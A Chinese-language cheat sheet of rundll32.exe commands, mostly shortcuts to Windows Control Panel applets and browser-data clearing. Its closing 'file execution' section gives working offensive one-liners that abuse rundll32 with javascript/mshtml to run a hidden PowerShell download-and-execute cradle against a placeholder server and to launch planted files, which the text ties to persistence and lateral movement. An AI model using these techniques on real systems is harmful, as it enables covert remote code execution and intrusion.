C:\WINDOWS\System32\rundll32.exe newdev.dll,DeviceInternetSettingUi //设备安装设置
C:\WINDOWS\System32\rundll32.exe powrprof.dll,SetSuspendState //电脑休眠 C:\WINDOWS\System32\rundll32.exe Printui.dll,PrintUIEntry /? //打印机用户界面 C:\WINDOWS\System32\rundll32.exe pwlauncher.dll,ShowPortableWorkspaceLauncherConfigurationUX //windows to go选项 C:\WINDOWS\System32\rundll32.exe shdocvw.dll,DoOrganizeFavDlg //收藏夹 C:\WINDOWS\System32\rundll32.exe shwebsvc.dll AddNetPlaceRunDll //添加网络位置向导 C:\WINDOWS\System32\rundll32.exe tcpmonui.dll,LocalAddPortUI //tcp,端口打印机添加 C:\WINDOWS\System32\rundll32.exe user32.dll,LockWorkStation //锁屏 C:\WINDOWS\System32\rundll32.exe user32.dll,SwapMouseButton //鼠标左右键交换,很恶心 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255 //清楚浏览器历史记录
C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351 //删除所有浏览历史和加载项历史 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 2 //删除 cookie 和网站数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16834 //删除下载数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16 //删除表单数据 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 32 //删除浏览器密码 C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 8 //删除临时 Internet 文件和网站文件 C:\WINDOWS\System32\rundll32.exe sysdm.cpl,EditEnvironmentVariables //环境变量 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL //控制面板 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL HotPlug.dll //删除硬件 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2} //文本服务和输入语言 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL joy.cpl //游戏控制器 PS:当然,我们也可以直接使用control joy.cpl直接打开 也可以使用vbs文件(双击&&wscript //e:jscript joy.vbs),js文件(wscript //e:jscript joy.js)
也可以使用 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl //控制面板->用户账户 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL wscui.cpl //安全和维护 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL NetSetup.cpl //配置无线路由器接入点 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl //浏览器属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 //键盘属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl //鼠标属性 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl //网络连接 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl //ODBC数据库管理 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1 //系统属性,更改计算机名 C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL cscui.dll,,0 //启用脱机文件 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL access.cpl //轻松使用设置中心 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL srchadmin.dll //索引选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl //启用平板的笔 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl //打开电源选项 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0 //声音设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0 //程序和功能 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL firewall.cpl //打开防火墙 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl //打开系统显示 C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl,,0 //桌面图标设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0 //区域,时间设置 C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL C:\WINDOWS\System32\Speech\SpeechUX\sapi.cpl,,1 //语音文字转化 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 0 //文件资源管理器 C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 2 //文件资源管理器选项 C:\WINDOWS\System32\rundll32.exe shell32.dll ShellAbout //关于电脑本机 C:\WINDOWS\System32\rundll32.exe shell32.dll SHHelpShortcuts_RunDLL AddPrinter //添加打印机 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder //字体 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect //映射网络驱动器 C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder //打印机列表 二.文件执行 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))") //执行powershell rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) //执行我们的cpl文件 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("ConsoleApplication1.exe")+"\74/script)") //执行我们的exe文件 当然,还有我们的-localserver以及-sta参数可以让我们更方便的权限维持或者横向移动